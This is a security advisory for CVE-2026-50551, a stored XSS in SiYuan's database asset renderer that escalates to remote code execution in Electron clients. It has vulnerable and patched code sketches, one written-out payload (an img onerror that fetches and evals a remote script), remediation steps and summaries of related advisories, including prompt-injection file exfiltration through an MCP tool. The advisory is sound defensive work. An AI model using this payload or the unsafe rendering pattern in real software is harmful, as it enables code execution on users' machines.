Jul 10, 2026·6 min read·5 visits
Stored XSS in SiYuan's database asset renderer allows unauthenticated remote code execution via synchronizing a maliciously crafted database in Electron clients.
A critical-severity stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan's Attribute View database asset cell renderer. This flaw allows low-privilege authenticated users to execute arbitrary JavaScript in the application frontend. In Electron-based desktop clients, this execution context can be leveraged to execute arbitrary native operating system commands, resulting in complete system compromise.
SiYuan is an open-source personal knowledge management system designed with a focus on privacy and local-first data storage. A central feature of the platform is the Attribute View, which functions as a structured database allowing users to organize notes, documents, and various fields. This interface acts as a significant attack surface because it processes complex user-defined schemas and external inputs.
The vulnerability, identified as CVE-2026-50551, lies in the asset cell renderer component of this database feature. This specific module is responsible for rendering file attachments and visual links to uploaded assets within the user interface. Due to inadequate processing of these asset attributes, an authenticated user can inject malicious scripts into the application context.
The resulting flaw is classified under CWE-79 as a Stored Cross-Site Scripting vulnerability. While typical XSS exploits are limited to the browser sandbox, the desktop client's architecture relies on Electron. Consequently, the execution of arbitrary script code within the web context can bypass security boundaries and achieve full Remote Code Execution on the client operating system.
The primary technical defect resides in the improper neutralization of input before it is rendered inside the Document Object Model. When a user uploads a file or creates an asset link, the application assigns structural properties, including the filename, to the database entry. The application handles these properties as trusted data points during subsequent visual renderings.
During the rendering of an Attribute View database table, the asset cell renderer fetches the metadata string associated with each asset. Instead of applying strict sanitization or using safe text-binding APIs, the renderer constructs HTML blocks dynamically. This allows any HTML tags or JavaScript handlers contained within the asset name to be executed directly in the user session.
The vulnerability is highly operationalizable because the data synchronization engine propagates these database configurations. If a shared or compromised database is synchronized across multiple devices, the malicious asset cell renders automatically on each target system. There is no requirement for user interaction beyond the simple action of viewing the compromised table.
The translation from XSS to RCE is facilitated by the Electron desktop environment. Because the web application runs inside a native desktop wrapper, it has access to specific APIs exposed via the preload script. If the context bridge exposes powerful functions or raw Inter-Process Communication channels, a script executing in the web view can invoke operating system commands.
Analysis of the vulnerable code path reveals that the application dynamically constructed cell elements by concatenating strings containing asset names directly into container elements. This pattern exposes the application directly to HTML injection attacks.
// Conceptual representation of the vulnerable rendering path
function renderAssetCell(cellData, container) {
const assetName = cellData.name; // Attacker-controlled
const assetPath = cellData.path;
// Unsanitized concatenation leading to CWE-79
const htmlContent = `<div class="protyle-attr--asset">` +
`<a href="${assetPath}" title="${assetName}">` +
`<img src="/assets/icon.png" /> ${assetName}` +
`</a></div>`;
container.innerHTML = htmlContent;
}To resolve this vulnerability, the fix implemented in commit 27e0051e0d067892e833df1063cb2fb469600e98 introduces strict sanitization before rendering elements. Rather than directly assigning unvalidated strings to HTML attributes, the application now sanitizes the string using safe parsing functions or builds elements programmatically via the standard DOM API.
// Conceptual representation of the patched rendering path
function renderAssetCellPatched(cellData, container) {
const assetName = cellData.name;
const assetPath = cellData.path;
// Clear the container first
container.innerHTML = '';
const wrapper = document.createElement('div');
wrapper.className = 'protyle-attr--asset';
const link = document.createElement('a');
// Safe assignment of attributes prevents payload execution
link.setAttribute('href', encodeURI(assetPath));
link.setAttribute('title', assetName);
const img = document.createElement('img');
img.setAttribute('src', '/assets/icon.png');
const textNode = document.createTextNode(` ${assetName}`);
link.appendChild(img);
link.appendChild(textNode);
wrapper.appendChild(link);
container.appendChild(wrapper);
}This remediation structurally eliminates the XSS threat vector. By utilizing document.createElement, setAttribute, and document.createTextNode, the browser parser treats all injected values strictly as data rather than executable markup.
Exploitation of CVE-2026-50551 requires low-privilege access to modify or sync a database within the SiYuan workspace. An attacker begins by crafting a malicious asset or renaming an existing one to include active script tags. The payload is designed to trigger when rendered within an anchor or image source error context.
Malicious Asset Name: "><img src=x onerror="fetch('http://127.0.0.1:8000/payload.js').then(r=>r.text()).then(eval)">Once the database configuration synchronizes to the target client, viewing the specific table page invokes the renderer. The cell parses the filename literal and injects the broken HTML tag, causing the onerror attribute to execute immediately in the victim's application context.
The script then utilizes the exposed Electron interface to escalate privileges. Because the frontend context can send messages over the IPC channel, the script calls exposed functions that wrapper node operations or system execution commands. This bypasses the typical web sandbox, leading to arbitrary binary execution.
The vulnerability is rated as Critical with a CVSS v3.1 score of 9.9. The high severity reflects the ease of exploitation once an attacker has permission to upload files, combined with the lack of required interaction from other workspace users.
The most significant element of the CVSS vector is the Scope Change (S:C). In standard web applications, XSS compromises only the origin data. In Electron-based applications, a compromise of the renderer context often allows the attacker to interact with backend operating system APIs, breaking the application's logical boundaries.
Successful execution grants the attacker the exact permissions of the running OS user. This allows full access to local files, system configurations, and network environments. It also creates opportunities for persistent backdoors or lateral movement across enterprise networks.
The primary remediation step is to upgrade all SiYuan server and client installations to version 3.7.0 or higher. This release contains the formal patch that replaces dynamic string-based HTML insertion with safe DOM node creation APIs.
For self-hosted deployments where upgrading cannot be performed immediately, access controls must be hardened. Administrators should restrict database creation and edit permissions to trusted users. Disabling automatic synchronization with untrusted or public workspaces reduces the distribution vector of the stored database configuration.
Long-term hardening for Electron-based clients should include strict verification of Context Isolation. Preload scripts should only expose highly restricted, input-validated API wrappers to the renderer process. All IPC messages received by the main process must undergo schema validation and authorization checks to prevent unauthorized command execution.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
siyuan siyuan-note | < 3.7.0 | 3.7.0 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-79 |
| Attack Vector | Network (AV:N) |
| CVSS Score | 9.9 (Critical) |
| Impact | Remote Code Execution (RCE) |
| Exploit Status | Proof of Concept (PoC) documented |
| KEV Status | Not listed |
The product does not sanitize or incorrectly sanitizes user-controlled input before including it in generated web pages, allowing attackers to execute arbitrary script code.
A directory traversal vulnerability exists in the mcp-atlassian integration server prior to version 0.22.0. The confluence_upload_attachment tool fails to restrict the paths of uploaded files, allowing authenticated users or external prompt injection payloads to retrieve and exfiltrate arbitrary files from the server's filesystem into Confluence.
A critical-severity Stored Cross-Site Scripting (XSS) vulnerability exists in the SiYuan personal knowledge management system. Due to missing sanitization in the attribute-view cell renderer and an insecure Electron default configuration (nodeIntegration: true), attackers can execute arbitrary commands on the victim's host operating system through synchronized workspaces.
Clauster versions up to and including v0.2.1 suffer from an authentication bypass vulnerability. This issue occurs when Clauster is configured with an authentication method but the master auth.enabled key is omitted or set to false, allowing unauthenticated network access to administrative endpoints and arbitrary code execution through managed Claude Code bridges.
An authentication bypass and token leakage vulnerability exists in TSDProxy before version 1.4.4. The application unconditionally forwards its internal administrative token to all proxied backend services when identity headers are enabled. Attackers with control over an upstream backend can capture this token and replay it to the local management API to achieve full administrative control over the proxy engine.
A high-severity Stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan prior to version 3.7.0. The vulnerability is located within the server-side Markdown-to-HTML parsing component for the Bazaar marketplace packages. Due to an incomplete event-handler attribute blocklist in the lute parsing engine and a lack of client-side DOM sanitization, malicious package authors can bypass restrictions using modern HTML5 event handlers. When an authenticated administrator views a malicious package, the embedded JavaScript runs in the administrator origin, allowing unauthorized workspace access, local file reading, and remote API execution.
A DNS-rebinding Time-of-Check to Time-of-Use (TOCTOU) vulnerability exists in the mcp-atlassian server before version 0.17.0. The server processes unauthenticated client-supplied URLs via custom headers, validating the destination IP but failing to pin the resolved address before connecting. This allows remote adjacent-network attackers to achieve Server-Side Request Forgery (SSRF) and access restricted resources or cloud metadata services.